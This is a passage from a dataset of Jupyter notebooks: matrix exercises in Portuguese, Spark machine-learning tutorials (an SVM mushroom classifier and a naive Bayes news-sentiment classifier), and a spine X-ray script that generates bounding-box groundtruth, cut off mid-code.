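"# Added sketch (not in the original notebook): the same column selection using\n# NumPy's 2-D indexing, assuming numpy is installed. Uses the numeric sales\n# table from earlier in the notebook.\nimport numpy as np\n\nm = np.array([[100, 15, 40], [200, 30, 80], [40, 120, 60]])\nprint(m[:, 1])  # all rows, column 1 -> [ 15  30 120]",
"_____no_output_____"
]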
],
[
[
"## Exercícios",
"_____no_output_____"
],
[
"**Ex 1: Crie uma matriz 3x4, todas as posições com o valor 1 **",
"_____no_output_____"
],
[
"** Ex 2: Dada a matriz abaixo, multiplique todos os valores por 2 e grave-os na mesma matriz**",
"_____no_output_____"
]
],
[
[
"m = [[1,2,3],[4,3,2],[9,4,3]]",
"_____no_output_____"
]
],
[
[
"** Ex 3: Usando a mesma matriz do exercício anterior, faça um programa que peça ao usuário dois números x e y. Seu programa deverá dizer qual número está na posição x,y da matriz.**",
"_____no_output_____"
],
[
"**Ex 4: Considere a tabela de vendas abaixo. Calcule o total de vendas por produto. **\n\n| | 1a Quinzena | 2a Quinzena | 3a Quinzena |\n|----------|:-------------:|------:|------:\n| Prod1 | 100 | 15 | 40 |\n| Prod2 | 200 | 30 | 80 |\n| Prod3 | 40 | 120 | 60 |",
"_____no_output_____"
],
[
"**Ex 5: Dadas as duas matrizez abaixo, crie um código que faça a soma das duas matrizes, gravando em uma terceira matriz**",
"_____no_output_____"
]
],
[
[
"matriz1 = [[3,2,6],[4,8,9],[2,5,0]]\nmatriz2 = [[2,6,8],[2,3,4],[6,8,1]]",
"_____no_output_____"
]
],
[
[
"** Ex 6: Faça um programa que peça ao usuário que digite dois números A e B. Gere uma matriz com dimensões A X B onde cada posição da matriz será preenchida por um número aleatório entre 1 e 100 **",
"_____no_output_____"
],
[
"** Ex 7: Usando a mesma matriz do exercício anterior, calcule a soma dos elementos da matriz **",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
]
] |
e707c99edd768737b884002b766ebe721c399fd1 | 15,417 | ipynb | Jupyter Notebook | files/exercises/mushroom_classification_SVM_CV.ipynb | erikschmitt/DataScienceW20 | 599eea52a166d7f180a499f98a7bcca143657e68 | [
"Apache-2.0"
] | null | null | null | files/exercises/mushroom_classification_SVM_CV.ipynb | erikschmitt/DataScienceW20 | 599eea52a166d7f180a499f98a7bcca143657e68 | [
"Apache-2.0"
] | null | null | null | files/exercises/mushroom_classification_SVM_CV.ipynb | erikschmitt/DataScienceW20 | 599eea52a166d7f180a499f98a7bcca143657e68 | [
"Apache-2.0"
] | null | null | null | 40.893899 | 1,420 | 0.637673 | [
[
[
"from pyspark.ml.evaluation import BinaryClassificationEvaluator\nfrom pyspark.ml.classification import LinearSVC, RandomForestClassifier\nfrom pyspark.ml.feature import IndexToString, Normalizer, StringIndexer, VectorAssembler, VectorIndexer\nfrom pyspark.ml.pipeline import Pipeline\nfrom pyspark.ml.tuning import CrossValidator, ParamGridBuilder\nfrom pyspark.sql.functions import expr\nfrom pyspark.sql.session import SparkSession\nfrom pyspark.sql.types import BooleanType\nfrom pyspark.mllib.evaluation import MulticlassMetrics\nfrom helpers.helper_functions import translate_to_file_string\nfrom pyspark.ml.classification import LinearSVC\nimport pandas as pd\nimport numpy as np\n\n# for pretty printing\ndef printDf(sprkDF): \n newdf = sprkDF.toPandas()\n from IPython.display import display, HTML\n return HTML(newdf.to_html())",
"_____no_output_____"
],
[
"inputFile = \"hdfs:///data/mushrooms.csv\"",
"_____no_output_____"
],
[
"spark = (SparkSession\n .builder\n .master(\"yarn\")\n .appName(\"Mushroom/Classification\")\n .getOrCreate())",
"_____no_output_____"
],
[
"df = spark.read.option(\"header\", \"true\") \\\n .option(\"inferSchema\", \"true\") \\\n .option(\"delimiter\", \",\") \\\n .csv(inputFile)",
"_____no_output_____"
]
],
[
[
"# String- Werte in numerische Werte umwandeln",
"_____no_output_____"
]
],
[
[
"labelIndexer = StringIndexer().setInputCol(\"class\").setOutputCol(\"label\").fit(df)\n#cap_shapeIndexer = StringIndexer().setInputCol(\"cap-shape\").setOutputCol(\"cap_shapeNUM\").fit(df)\n#cap_surfaceIndexer = StringIndexer().setInputCol(\"cap-surface\").setOutputCol(\"cap_surfaceNUM\").fit(df)\n#cap_colorIndexer = StringIndexer().setInputCol(\"cap-color\").setOutputCol(\"cap_colorNUM\").fit(df)\n#bruisesIndexer = StringIndexer().setInputCol(\"bruises\").setOutputCol(\"bruisesNUM\").fit(df)\nodorIndexer = StringIndexer().setInputCol(\"odor\").setOutputCol(\"odorNUM\").fit(df)\n#gill_attachmentIndexer = StringIndexer().setInputCol(\"gill-attachment\").setOutputCol(\"gill_attachmentNUM\").fit(df)\n#gill_spacingIndexer = StringIndexer().setInputCol(\"gill-spacing\").setOutputCol(\"gill_spacingNUM\").fit(df)\ngill_sizeIndexer = StringIndexer().setInputCol(\"gill-size\").setOutputCol(\"gill_sizeNUM\").fit(df)\ngill_colorIndexer = StringIndexer().setInputCol(\"gill-color\").setOutputCol(\"gill_colorNUM\").fit(df)\n#stalk_shapeIndexer = StringIndexer().setInputCol(\"stalk-shape\").setOutputCol(\"stalk_shapeNUM\").fit(df)\nstalk_rootIndexer = StringIndexer().setInputCol(\"stalk-root\").setOutputCol(\"stalk_rootNUM\").fit(df)\n#stalk_surface_above_ringIndexer = StringIndexer().setInputCol(\"stalk-surface-above-ring\").setOutputCol(\"stalk_surface_above_ringNUM\").fit(df)\n#stalk_surface_below_ringIndexer = StringIndexer().setInputCol(\"stalk-surface-below-ring\").setOutputCol(\"stalk_surface_below_ringNUM\").fit(df)\n#stalk_color_above_ringIndexer = StringIndexer().setInputCol(\"stalk-color-above-ring\").setOutputCol(\"stalk_color_above_ringNUM\").fit(df)\n#stalk_color_below_ringIndexer = StringIndexer().setInputCol(\"stalk-color-below-ring\").setOutputCol(\"stalk_color_below_ringNUM\").fit(df)\n#veil_typeIndexer = StringIndexer().setInputCol(\"veil-type\").setOutputCol(\"veil_typeNUM\").fit(df)\n#veil_colorIndexer = StringIndexer().setInputCol(\"veil-color\").setOutputCol(\"veil_colorNUM\").fit(df)\n#ring_numberIndexer = StringIndexer().setInputCol(\"ring-number\").setOutputCol(\"ring_numberNUM\").fit(df)\nring_typeIndexer = StringIndexer().setInputCol(\"ring-type\").setOutputCol(\"ring_typeNUM\").fit(df)\nspore_print_colorIndexer = StringIndexer().setInputCol(\"spore-print-color\").setOutputCol(\"spore_print_colorNUM\").fit(df)\npopulationIndexer = StringIndexer().setInputCol(\"population\").setOutputCol(\"populationNUM\").fit(df)\n#habitatIndexer = StringIndexer().setInputCol(\"habitat\").setOutputCol(\"habitatNUM\").fit(df)",
"_____no_output_____"
]
],
[
[
"Augrund den Erkenntnissen aus dem Notebook Dataunderstanding wird der Feature Vektor auf 7 Merkmale reduziert",
"_____no_output_____"
]
],
[
[
"featureCols = df.columns.copy()\nfeatureCols.remove(\"class\")\nfeatureCols.remove(\"cap-shape\")\nfeatureCols.remove(\"cap-surface\")\nfeatureCols.remove(\"cap-color\")\nfeatureCols.remove(\"odor\")\nfeatureCols.remove(\"bruises\")\nfeatureCols.remove(\"gill-attachment\")\nfeatureCols.remove(\"gill-spacing\")\nfeatureCols.remove(\"gill-size\")\nfeatureCols.remove(\"gill-color\")\nfeatureCols.remove(\"stalk-shape\")\nfeatureCols.remove(\"stalk-root\")\nfeatureCols.remove(\"stalk-surface-above-ring\")\nfeatureCols.remove(\"stalk-surface-below-ring\")\nfeatureCols.remove(\"stalk-color-above-ring\")\nfeatureCols.remove(\"stalk-color-below-ring\")\nfeatureCols.remove(\"veil-type\")\nfeatureCols.remove(\"veil-color\")\nfeatureCols.remove(\"ring-number\")\nfeatureCols.remove(\"ring-type\")\nfeatureCols.remove(\"spore-print-color\")\nfeatureCols.remove(\"population\")\nfeatureCols.remove(\"habitat\")\n\n#featureCols = featureCols + [\"cap_shapeNUM\",\"cap_surfaceNUM\", \"cap_colorNUM\", \"bruisesNUM\", \"odorNUM\", \"gill_attachmentNUM\", \"gill_spacingNUM\", \"gill_sizeNUM\", \"gill_colorNUM\", \"stalk_shapeNUM\", \"stalk_rootNUM\", \"stalk_surface_above_ringNUM\", \"stalk_surface_below_ringNUM\", \"stalk_color_above_ringNUM\", \"stalk_color_below_ringNUM\", \"veil_colorNUM\", \"ring_numberNUM\", \"ring_typeNUM\", \"spore_print_colorNUM\", \"populationNUM\", \"habitatNUM\"]\nfeatureCols = featureCols + [\"odorNUM\",\"gill_sizeNUM\", \"gill_colorNUM\", \"stalk_rootNUM\", \"ring_typeNUM\", \"spore_print_colorNUM\", \"populationNUM\"]\n\nprint(featureCols)",
"['odorNUM', 'gill_sizeNUM', 'gill_colorNUM', 'stalk_rootNUM', 'ring_typeNUM', 'spore_print_colorNUM', 'populationNUM']\n"
],
[
"labeledData = labelIndexer.transform(df)\n\n#labeledDataNUM = cap_shapeIndexer.transform(cap_surfaceIndexer.transform(cap_colorIndexer.transform(bruisesIndexer.transform(odorIndexer.transform(gill_attachmentIndexer.transform(gill_spacingIndexer.transform(gill_sizeIndexer.transform(gill_colorIndexer.transform(stalk_shapeIndexer.transform(stalk_rootIndexer.transform(stalk_surface_above_ringIndexer.transform(stalk_surface_below_ringIndexer.transform(stalk_color_above_ringIndexer.transform(stalk_color_below_ringIndexer.transform(veil_colorIndexer.transform(veil_typeIndexer.transform(ring_numberIndexer.transform(ring_typeIndexer.transform(spore_print_colorIndexer.transform(populationIndexer.transform(habitatIndexer.transform(labeledData))))))))))))))))))))))\nlabeledDataNUM = odorIndexer.transform(gill_sizeIndexer.transform(gill_colorIndexer.transform(stalk_rootIndexer.transform(ring_typeIndexer.transform(spore_print_colorIndexer.transform(populationIndexer.transform(labeledData)))))))\nassembler = VectorAssembler(outputCol=\"features\", inputCols=featureCols)",
"_____no_output_____"
],
[
"splits = labeledDataNUM.randomSplit([0.9, 0.1 ], 12345)\ntraining = splits[0]\ntest = splits[1]",
"_____no_output_____"
]
],
[
[
"# SVM Klassifizierung mit Crossvalidation",
"_____no_output_____"
]
],
[
[
"evaluator = BinaryClassificationEvaluator(labelCol=\"label\",rawPredictionCol=\"prediction\", metricName=\"areaUnderROC\")",
"_____no_output_____"
],
[
"lsvc = LinearSVC(labelCol=\"label\",aggregationDepth=2, featuresCol=\"features\") ",
"_____no_output_____"
],
[
"pipeline = Pipeline(stages= [assembler, lsvc])",
"_____no_output_____"
],
[
"paramGrid = ParamGridBuilder().addGrid(lsvc.maxIter, [100])\\\n .addGrid(lsvc.regParam, [0.1, 0.001, 0.0001])\\\n .addGrid(lsvc.standardization, [True, False])\\\n .build()",
"_____no_output_____"
],
[
"cvSVM = CrossValidator(estimator=pipeline, evaluator=evaluator, estimatorParamMaps=paramGrid, numFolds=5, parallelism=2)",
"_____no_output_____"
],
[
"cvSVMModel = cvSVM.fit(training)",
"_____no_output_____"
]
],
[
[
"## Ausgabe der Crossvalidation Ergebnisse ",
"_____no_output_____"
]
],
[
[
"linearSVMModel = cvSVMModel.bestModel.stages[1]\nprint(\"Best Params: \\n\", linearSVMModel.explainParams())\nprint(\"Param Map: \\n\", linearSVMModel.extractParamMap())",
"Best Params: \n aggregationDepth: suggested depth for treeAggregate (>= 2). (default: 2, current: 2)\nfeaturesCol: features column name. (default: features, current: features)\nfitIntercept: whether to fit an intercept term. (default: True)\nlabelCol: label column name. (default: label, current: label)\nmaxIter: max number of iterations (>= 0). (default: 100, current: 100)\npredictionCol: prediction column name. (default: prediction)\nrawPredictionCol: raw prediction (a.k.a. confidence) column name. (default: rawPrediction)\nregParam: regularization parameter (>= 0). (default: 0.0, current: 0.001)\nstandardization: whether to standardize the training features before fitting the model. (default: True, current: True)\nthreshold: The threshold in binary classification applied to the linear model prediction. This threshold can be any real number, where Inf will make all predictions 0.0 and -Inf will make all predictions 1.0. (default: 0.0)\ntol: the convergence tolerance for iterative algorithms (>= 0). (default: 1e-06)\nweightCol: weight column name. If this is not set or empty, we treat all instance weights as 1.0. (undefined)\nParam Map: \n {Param(parent='LinearSVC_955a52b8396d', name='aggregationDepth', doc='suggested depth for treeAggregate (>= 2).'): 2, Param(parent='LinearSVC_955a52b8396d', name='featuresCol', doc='features column name.'): 'features', Param(parent='LinearSVC_955a52b8396d', name='fitIntercept', doc='whether to fit an intercept term.'): True, Param(parent='LinearSVC_955a52b8396d', name='labelCol', doc='label column name.'): 'label', Param(parent='LinearSVC_955a52b8396d', name='maxIter', doc='max number of iterations (>= 0).'): 100, Param(parent='LinearSVC_955a52b8396d', name='predictionCol', doc='prediction column name.'): 'prediction', Param(parent='LinearSVC_955a52b8396d', name='rawPredictionCol', doc='raw prediction (a.k.a. confidence) column name.'): 'rawPrediction', Param(parent='LinearSVC_955a52b8396d', name='regParam', doc='regularization parameter (>= 0).'): 0.001, Param(parent='LinearSVC_955a52b8396d', name='standardization', doc='whether to standardize the training features before fitting the model.'): True, Param(parent='LinearSVC_955a52b8396d', name='threshold', doc='The threshold in binary classification applied to the linear model prediction. This threshold can be any real number, where Inf will make all predictions 0.0 and -Inf will make all predictions 1.0.'): 0.0, Param(parent='LinearSVC_955a52b8396d', name='tol', doc='the convergence tolerance for iterative algorithms (>= 0).'): 1e-06}\n"
],
[
"predictions = cvSVMModel.transform(test)",
"_____no_output_____"
]
],
[
[
"# Test Error und Confusion Matrix ausgeben",
"_____no_output_____"
]
],
[
[
"accuracy = evaluator.evaluate(predictions)\nprint(\"Test Error\", (1.0 - accuracy))",
"Test Error 0.0741130393763344\n"
],
[
"predictionAndLabels = predictions.select(\"prediction\", \"label\").rdd.map(lambda p: [p[0], float(p[1])])\nmetrics = MulticlassMetrics(predictionAndLabels)",
"_____no_output_____"
],
[
"confusion = metrics.confusionMatrix()\nprint(\"Confusion matrix: \\n\" , confusion)",
"Confusion matrix: \n DenseMatrix([[373., 19.],\n [ 41., 370.]])\n"
],
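As a cross-check, class-wise precision and recall can be read off the confusion matrix printed above; a sketch reusing the `metrics` object from the cell above (`accuracy`, `precision(label)` and `recall(label)` are standard `MulticlassMetrics` members):

```python
# Rows are true labels, columns are predictions: [[373., 19.], [41., 370.]]
print("Accuracy:", metrics.accuracy)            # (373 + 370) / 803
print("Precision(0):", metrics.precision(0.0))  # 373 / (373 + 41)
print("Recall(0):", metrics.recall(0.0))        # 373 / (373 + 19)
```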
[
"spark.stop()",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code"
]
] |
e707d3c962da08eda45196276b834dc2c4958d57 | 4,676 | ipynb | Jupyter Notebook | Chapter_7/Section_7.4.1.2.ipynb | godfanmiao/ML-Kaggle-Github-2023 | 89e82bb5c22764461f5d8e855fced556a5f7750c | [
"BSD-3-Clause"
] | 5 | 2021-11-04T02:01:10.000Z | 2021-12-26T03:13:43.000Z | Chapter_7/.ipynb_checkpoints/Section_7.4.1.2-checkpoint.ipynb | godfanmiao/ML-Kaggle-Github-2023 | 89e82bb5c22764461f5d8e855fced556a5f7750c | [
"BSD-3-Clause"
] | null | null | null | Chapter_7/.ipynb_checkpoints/Section_7.4.1.2-checkpoint.ipynb | godfanmiao/ML-Kaggle-Github-2023 | 89e82bb5c22764461f5d8e855fced556a5f7750c | [
"BSD-3-Clause"
] | 1 | 2022-01-01T03:33:18.000Z | 2022-01-01T03:33:18.000Z | 29.408805 | 153 | 0.474979 | [
[
[
"##################################################################\n#《Python机器学习及实践:从零开始通往Kaggle竞赛之路(2023年度版)》开源代码\n#-----------------------------------------------------------------\n# @章节号:7.4.1.2(分布式朴素贝叶斯分类模型) \n# @作者:范淼 \n# @电子邮箱:[email protected] \n# @微博:https://weibo.com/fanmiaothu \n# @官方交流QQ群号:561500762 \n##################################################################",
"_____no_output_____"
],
[
"from pyspark.sql import SparkSession\nimport pyspark.sql.functions as func\n\n\n#创建SparkSession。\nspark = SparkSession.builder.getOrCreate()\n\n#读取文件并存储到DataFrame中。\ndf = spark.read.csv('../Datasets/news/news_sentiment.csv', header=False)\n\n#指定标签列,并对文本特征列的数据进行分词处理。\ndf = df.select(df._c0.alias('label'), func.split(df._c1, ' ').alias('words'))\n\n#分割出训练和测试集。\n(train_df, test_df) = df.randomSplit([0.8, 0.2], seed=911120)",
"21/11/18 09:56:04 WARN NativeCodeLoader: Unable to load native-hadoop library for your platform... using builtin-java classes where applicable\nUsing Spark's default log4j profile: org/apache/spark/log4j-defaults.properties\nSetting default log level to \"WARN\".\nTo adjust logging level use sc.setLogLevel(newLevel). For SparkR, use setLogLevel(newLevel).\n \r"
],
[
"from pyspark.ml.feature import CountVectorizer, StringIndexer, StandardScaler\nfrom pyspark.ml.classification import NaiveBayes\nfrom pyspark.ml import Pipeline\n\n\n#对标签数据进行数字化编码。\nlabelIndexer = StringIndexer(inputCol=\"label\", outputCol=\"idx_label\")\n\n#对文本数据进行词频特征抽取。\ncv = CountVectorizer(inputCol=\"words\", outputCol=\"features\", vocabSize=500)\n\n#使用朴素贝叶斯分类器。\nclassifier = NaiveBayes(labelCol=\"idx_label\", featuresCol=\"features\")\n\n#使用Pipeline,构建标签编码、特征抽取,以及模型分类的执行流程。\npipeline = Pipeline(stages=[labelIndexer, cv, classifier])\n\nmodel = pipeline.fit(train_df)\n\npredictions = model.transform(test_df)",
" \r"
],
[
"from pyspark.ml.evaluation import MulticlassClassificationEvaluator\n\n\nevaluator = MulticlassClassificationEvaluator(labelCol=\"idx_label\", predictionCol=\"prediction\", metricName=\"accuracy\")\n\naccuracy = evaluator.evaluate(predictions)\n\n#评估分类器的准确率。\nprint ('Spark-ML的朴素贝叶斯分类器在news_sentiment测试集上的准确率为:%.2f%%。' %(accuracy * 100))",
"\r[Stage 9:> (0 + 1) / 1]\r"
]
]
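A hedged follow-up, reusing the `predictions` DataFrame from above: the same evaluator class also reports F1 (`metricName="f1"` is part of the standard Spark ML API; `f1_evaluator` is an illustrative name):

```python
from pyspark.ml.evaluation import MulticlassClassificationEvaluator

f1_evaluator = MulticlassClassificationEvaluator(
    labelCol="idx_label", predictionCol="prediction", metricName="f1")
print('F1 on the news_sentiment test set: %.4f' % f1_evaluator.evaluate(predictions))
```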
] | [
"code"
] | [
[
"code",
"code",
"code",
"code"
]
] |
e707dc1e59e1f99a5e7bab60f321b0ea494d942c | 18,904 | ipynb | Jupyter Notebook | Jupyter_Notebooks/generate_groundtruth.ipynb | Bidur-Khanal/SpineCurvEst | 6d4858b8ade5bfe6ebb21ce2d9faca249cb065f8 | [
"MIT"
] | 15 | 2019-10-21T13:52:32.000Z | 2021-10-01T13:59:01.000Z | Jupyter_Notebooks/generate_groundtruth.ipynb | wangcongbme/SpineCurvEst | 6d4858b8ade5bfe6ebb21ce2d9faca249cb065f8 | [
"MIT"
] | 3 | 2020-07-14T05:14:41.000Z | 2021-07-07T18:42:20.000Z | Jupyter_Notebooks/generate_groundtruth.ipynb | wangcongbme/SpineCurvEst | 6d4858b8ade5bfe6ebb21ce2d9faca249cb065f8 | [
"MIT"
] | 8 | 2019-10-21T13:52:41.000Z | 2021-12-10T03:30:07.000Z | 40.393162 | 472 | 0.559194 | [
[
[
"## Generate Dataset: ##\n\nGenerate bounding box groundtruth for object detection. An image consists of 17 vertebrae, each considered as different objects. Using the corner landmark-coordinates, bound each object with rectangular box. Every image will have 17 objects, each belonging to different class (17 classes in total), with 4 bounding box coordinates for each object. This script will output a csv file with column headers as: <br/>``` [ image_name, xmin, ymin, xmax, ymax, label ] ```",
"_____no_output_____"
]
],
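A minimal sketch of the core step described above, assuming four corner landmarks of one vertebra in pixel coordinates; the `corners` values and the padding of 10 px are illustrative:

```python
import numpy as np
import cv2

# Four corner landmarks (x, y) of one vertebra, as int32 for cv2
corners = np.array([[120, 300], [180, 298], [122, 340], [182, 338]], dtype=np.int32)
x, y, w, h = cv2.boundingRect(corners)                            # tight axis-aligned box
xmin, ymin, xmax, ymax = x - 10, y - 10, x + w + 10, y + h + 10   # padded box for the CSV row
print(xmin, ymin, xmax, ymax)
```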
[
[
"import numpy as np\nimport cv2\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom matplotlib import cm\nimport os",
"_____no_output_____"
],
[
"### visualize the bounding boxes\n\nfilename = \"sunhl-1th-10-Jan-2017-254 A AP.jpg\"\nimage_directory= \"C:/Users/Brinda Khanal/Downloads/scoliosis xray Single View/boostnet_labeldata/data/training/\"\nlabel_directory= \"C:/Users/Brinda Khanal/Downloads/scoliosis xray Single View/boostnet_labeldata/labels/training/\"\nimage = image_directory+filename\n\n\nimg = cv2.imread(image)\n\ndata= pd.read_csv(label_directory+\"landmarks.csv\",header= None)\nfilename_labels= pd.read_csv(label_directory+\"filenames.csv\",header= None)\n\nprint (\"image shape:\",img.shape)\nindx= filename_labels[filename_labels.iloc[:,0]== filename].index.tolist()\nlandmark= data.iloc[indx[0]].values\nfor m in range(0,68):\n cv2.circle(img,(int(img.shape[1]*landmark[m]),int(img.shape[0]*landmark[m+68])), 10, (255,255,255), -1)\n\nlandmark = [[int(round(img.shape[1]*landmark[m])),int(round(img.shape[0]*landmark[m+68]))] for m in range (0,68)]\n#print (landmark)\n\n\nN=4 \ncorners = [landmark[n:n+N] for n in range(0, len(landmark), N)]\ncorners= np.array(corners)\n\navg=[]\nfor box in corners:\n x,y,w,h = cv2.boundingRect(box) \n cv2.rectangle(img,(x-10,y-10),(x+w+10,y+h+10),(0,255,0),5)\n avg.append((w+10,h+10))\n print (x-10,y-10,w+10,h+10)\n \nprint (np.mean(avg,axis=0))\n\nplt.figure(1, figsize=(25,25))\n\n\nplt.subplot(211)\nplt.imshow(img[:,:,::-1])\n",
"_____no_output_____"
]
],
[
[
"### Save all the bounding boxes to visiualize",
"_____no_output_____"
]
],
[
[
"def visualize_all_bounding_box(image_directory, filenames_csv, landmarks_csv, save_path, split_type= 'train'):\n \n landmarks_data= pd.read_csv(landmarks_csv,header= None)\n filename_labels= pd.read_csv(filenames_csv,header= None)\n\n \n for i, names in enumerate(filename_labels.iloc[:,0]):\n\n img = cv2.imread(image_directory+names)\n print (image_directory+names)\n print (names)\n #print (\"image shape\",img.shape)\n landmarks = landmarks_data.loc[i].values\n landmarks = [[int(round(img.shape[1]*landmarks[m])),int(round(img.shape[0]*landmarks[m+68]))] for m in range (0,68)]\n \n # group landmark coordinates, each group has 4 points that represents a vertebra\n N=4 \n box = [landmarks[n:n+N] for n in range(0, len(landmarks), N)]\n #print (box)\n box= np.array(box)\n \n for c, box_coordinates in enumerate(box):\n x,y,w,h = cv2.boundingRect(box_coordinates) \n cv2.rectangle(img,(x-10,y-10),(x+w+10,y+h+10),(0,255,0),5)\n cv2.imwrite(save_path+split_type+'/'+names,img)\n ",
"_____no_output_____"
],
[
"ROOT_PATH = \"C:/Users/Brinda Khanal/Documents/Bidur Git Repo/Spine_Challenge/all landmark estimation/\"\ntrain_data_directory = os.path.join(ROOT_PATH, \"groundtruth for 68 landmarks detection/train/\")\n#val_data_directory = os.path.join(ROOT_PATH, \"data/val/\")\ntrain_label_directory=os.path.join(ROOT_PATH, \"groundtruth for 68 landmarks detection/\")\n#val_label_directory =os.path.join(ROOT_PATH, \"data/labels/val/\")\nsave_path=\"C:/Users/Brinda Khanal/Documents/Bidur Git Repo/Spine_Challenge/all landmark estimation/visualize boxes/\"\n\n### call make_csv function to create dataset in format supported by luminoth library\n\nvisualize_all_bounding_box(train_data_directory,os.path.join(train_label_directory,'train_filenames.csv'),\n os.path.join(train_label_directory,'predicted_train_landmarks.csv'),save_path, 'train')\n\n\n#visualize_all_bounding_box(val_data_directory,os.path.join(val_label_directory,'filenames.csv'),\n# os.path.join(val_label_directory,'landmarks.csv'),save_path, 'val')\n",
"_____no_output_____"
],
[
"def make_csv_bounding_box(image_directory, filenames_csv, landmarks_csv, split_type= 'train'):\n \n landmarks_data= pd.read_csv(landmarks_csv,header= None)\n filename_labels= pd.read_csv(filenames_csv,header= None)\n \n df= pd.DataFrame(columns=['image_id', 'xmin','ymin','xmax','ymax','label'])\n\n \n for i, names in enumerate(filename_labels.iloc[:,0]):\n\n img = cv2.imread(image_directory+names)\n print (names)\n #print (\"image shape\",img.shape)\n landmarks = landmarks_data.loc[i].values\n landmarks = [[int(round(img.shape[1]*landmarks[m])),int(round(img.shape[0]*landmarks[m+68]))] for m in range (0,68)]\n \n # group landmark coordinates, each group has 4 points that represents a vertebra\n N=4 \n box = [landmarks[n:n+N] for n in range(0, len(landmarks), N)]\n #print (box)\n box= np.array(box)\n \n for c, box_coordinates in enumerate(box):\n x,y,w,h = cv2.boundingRect(box_coordinates)\n if c < 12:\n df= df.append({'image_id': names, 'xmin': x-50, 'ymin': y-10, \n 'xmax': x+w+50,'ymax':y+h+10, 'label':1}, ignore_index=True) # increase the area of bounding rectangle if required\n else:\n df= df.append({'image_id': names, 'xmin': x-50, 'ymin': y-10, \n 'xmax': x+w+50,'ymax':y+h+10, 'label':2}, ignore_index=True) # increase the area of bounding rectangle if required\n \n csv_file= split_type + \".csv\"\n df.to_csv(csv_file,index= False)\n\n \n ",
"_____no_output_____"
],
[
"ROOT_PATH = \"C:/Users/Brinda Khanal/Documents/Bidur Git Repo/Spine_Challenge/Object detection/\"\ntrain_data_directory = os.path.join(ROOT_PATH, \"data/train/\")\nval_data_directory = os.path.join(ROOT_PATH, \"data/val/\")\ntrain_label_directory=os.path.join(ROOT_PATH, \"data/labels/train/\")\nval_label_directory =os.path.join(ROOT_PATH, \"data/labels/val/\")\n\n### call make_csv function to create dataset in format supported by luminoth library\n\nmake_csv_bounding_box(train_data_directory,os.path.join(train_label_directory,'filenames.csv'),\n os.path.join(train_label_directory,'landmarks.csv'), 'train')\n\n\nmake_csv_bounding_box(val_data_directory,os.path.join(val_label_directory,'filenames.csv'),\n os.path.join(val_label_directory,'landmarks.csv'), 'val')\n\n",
"_____no_output_____"
]
],
[
[
"## Generate GroundTruth for Landmark Prediction from Patch ##\n Using each vertebra bounding-box, generate patch-image (1 image will generate 17 patch-images). Find landmark-groundtruth-coordinates (between 0 and 1) for each patch.Save the groundtruth and patches.",
"_____no_output_____"
]
],
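The coordinate adjustment described above reduces to a shift-and-scale into the patch frame; a sketch with hypothetical numbers (`x0`, `pad_w`, `patch_w` mirror the roles of `x`, `increase_w` and the padded patch width in the code below):

```python
# Absolute image coordinate -> relative patch coordinate in [0, 1]
x0, pad_w, patch_w = 120, 50, 160   # box origin, padding, padded patch width
x_abs = 150                         # landmark x in the full image
x_rel = (x_abs - (x0 - pad_w)) / patch_w
print(x_rel)                        # 0.5
```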
[
[
"def make_csv_landmark(image_directory, filenames_csv, landmarks_csv, split_type= 'train'):\n \n landmarks_data= pd.read_csv(landmarks_csv,header= None)\n filename_labels= pd.read_csv(filenames_csv,header= None)\n \n df= pd.DataFrame(columns=['image_id', 'x1','y1','x2','y2','x3','y3','x4','y4'])\n\n \n for i, names in enumerate(filename_labels.iloc[:,0]):\n\n img = cv2.imread(image_directory+names)\n \n landmarks = landmarks_data.loc[i].values\n landmarks = [[int(round(img.shape[1]*landmarks[m])),int(round(img.shape[0]*landmarks[m+68]))] for m in range (0,68)]\n \n # group landmark coordinates, each group has 4 points that represents a vertebra\n N=4 \n box = [landmarks[n:n+N] for n in range(0, len(landmarks), N)]\n #print (box)\n box= np.array(box)\n \n \n for c, box_coordinates in enumerate(box):\n print (box_coordinates)\n x_,y_,w_,h_ = cv2.boundingRect(box_coordinates)\n \n _increase_w = 50 #increase bounding box by certain pixels \n _increase_h = 10\n \n # if increasing bounding box result in region outside the image,donot perform increment\n if (x_-_increase_w) <0 :\n _increase_w=0\n if (y_-_increase_h) <0 :\n _increase_h=0\n \n \n patch_image = crop_patch (img, x_,y_,w_,h_, increase_w=_increase_w, increase_h=_increase_h)\n \n adjusted_landmarks = adjust_landmarks_position(patch_image, box_coordinates, increase_w= _increase_w,\n increase_h= _increase_h ,x=x_,y=y_,w=w_, h= h_)\n \n \n patch_name = names.replace('.jpg', '')+'_'+str(c)+'.jpg' # filename for each patch\n print (\"For Patch: \",patch_name)\n \n \n #resized_patch= cv2.resize(patch_image,(200,120),interpolation=cv2.INTER_AREA) #resize the patches to a fixed size\n \n \n # create a dictionary to append into dataframe row\n adjusted_landmarks_= adjusted_landmarks.ravel()\n adjusted_landmarks_=np.append(adjusted_landmarks_,patch_name)\n keywords= ['x1','y1','x2','y2','x3','y3','x4','y4','image_id']\n adjusted_landmarks_dict= dict(zip(keywords,adjusted_landmarks_))\n \n \n print (adjusted_landmarks_dict)\n \n ''''# for visualization of landmark\n adjusted_landmarks[:,0]= adjusted_landmarks[:,0]*resized_patch.shape[1]\n adjusted_landmarks[:,1]= 